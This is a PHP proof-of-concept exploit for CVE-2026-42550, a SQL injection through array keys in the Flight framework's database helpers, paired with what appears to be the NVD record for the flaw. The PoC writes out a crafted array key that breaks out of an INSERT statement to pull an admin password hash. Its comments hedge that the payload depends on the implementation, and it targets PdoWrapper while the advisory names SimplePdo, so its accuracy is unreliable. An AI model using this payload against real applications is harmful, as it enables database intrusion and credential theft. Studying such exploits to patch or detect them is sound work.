CVE-2026-42550

<?php // PoC for CVE-2026-42550: SQL Injection via Array Keys in Flight Framework require 'vendor/autoload.php'; use flight\database\PdoWrapper; // Setup database connection $db = new PdoWrapper('mysql:host=localhost;dbname=test', 'user', 'pass'); // Malicious payload: The array key contains SQL injection syntax // The application code likely does: $db->insert('users', $_POST['data']); // If we send a POST request with 'data' having the following structure: $maliciousData = [ 'username' => 'victim', // The key below attempts to break out of the INSERT statement structure // and inject a subquery to extract the admin password hash. // Expected SQL: INSERT INTO users (`username`, `password`) VALUES (?, ?) // Injected SQL: INSERT INTO users (`username`, `password`) VALUES ('victim', (SELECT password FROM admin_users WHERE username='admin')) // Note: This depends on the exact implementation of insert(), but key injection is the vector. 'password`) VALUES ((SELECT password FROM admin_users WHERE username="admin")); -- ' => 'any_value' ]; try { // Vulnerable call pattern found in many apps using Flight helpers $db->insert('users', $maliciousData); echo "Exploit executed successfully. Check database for changes."; } catch (Exception $e) { // Error might occur due to syntax, but partial injection might execute or error reveals info echo "Error: " . $e->getMessage(); } ?>

{"cve": {"id": "CVE-2026-42550", "sourceIdentifier": "[email protected]", "published": "2026-05-13T20:16:22.060", "lastModified": "2026-05-14T16:51:08.300", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Flight is an extensible micro-framework for PHP. Prior to 3.18.1, SimplePdo::insert(), SimplePdo::update(), and SimplePdo::delete() build SQL statements by concatenating the $table argument and the keys of the $data array directly into the query, with no identifier quoting and no validation. When an application forwards user-controlled data shapes to these helpers — a common and documented pattern, e.g. $db->insert('users', $request->data->getData()) — an attacker can inject arbitrary SQL by crafting malicious array keys. This vulnerability is fixed in 3.18.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/flightphp/core/security/advisories/GHSA-xwqr-rcqg-22mr", "source": "[email protected]"}, {"url": "https://github.com/flightphp/core/security/advisories/GHSA-xwqr-rcqg-22mr", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}